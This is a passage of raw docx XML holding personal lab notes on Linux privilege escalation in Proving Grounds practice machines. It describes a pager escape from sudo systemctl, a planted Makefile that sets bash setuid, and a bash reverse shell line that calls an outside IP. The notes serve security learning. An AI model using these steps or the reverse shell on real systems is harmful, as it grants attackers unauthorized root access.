        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId669">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Scrutiny</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="345" name="image329.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image329.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67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1F65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/systemctl status teamcity-server.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3733800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="156" name="image147.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image147.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId671"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3733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F68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just use “sudo” to run what “sudo -l” gives us, then once in the pager, run “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="470" name="image467.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image467.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67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F6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/systemctl status teamcity-server.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mj5t3pc2hpoe" w:id="271"/>
      <w:bookmarkEnd w:id="271"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the SPX PG Practice, we saw this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1104900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="405" name="image390.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image390.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67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1F71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/make install -C /home/profiler/php-spx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run the installation process defined in the Makefile inside /home/profiler/php-sp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">install</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> = copy the compiled files into system directories (e.g., /usr/local/bin, /usr/lib, etc.) so the software is “installed.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you’re telling make: run the install instructions defined in the Makefile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-C </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">option means "change to this directory before running".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So instead of looking in the current directory for a Makefile, make will go into /home/profiler/php-spx, and run the install target defined there.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F77">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F78">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, all we have to know is that there is likely a Makefile inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/profiler/php-spx </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and we checked and we can actually modify it! So, we can either create a malicious one, or edit the original code to make it do something like run our own binary instead of running another binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F79">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId674">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create their own malicious Makefile from scratch:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm Makefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano Makefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">all:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       @echo "Do nothing in all"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F7F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F80">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">install:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F81">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       chmod u+s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/make install -C /home/profiler/php-spx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="393"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F84">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F85">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F86">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId675">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inspect the original makefile and redirect it to our own malicious binary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The folder holds a lot of file which I suspect is the config folder for php-spx, so I checked the Makefile and found a line with variable ‘SHELL’ and value ‘/bin/sh’, figured it is trying to call a shell command so i modified that line since I have full privilege on the Makefile to call the file ‘sh’ in ‘tmp’ which I have edited to give me reverse shell, chmod it to be executable and let it fly, and YAKATA! I am root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="200" name="image187.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image187.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67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F89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The edited the specified line in the Makefile to run the shell command "bash /tmp/sh" which is our malicious file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1117600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="162" name="image185.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image185.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67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1F8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we see that /tmp/sh has the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/192.168.45.203/1337 0&gt;61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1466"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
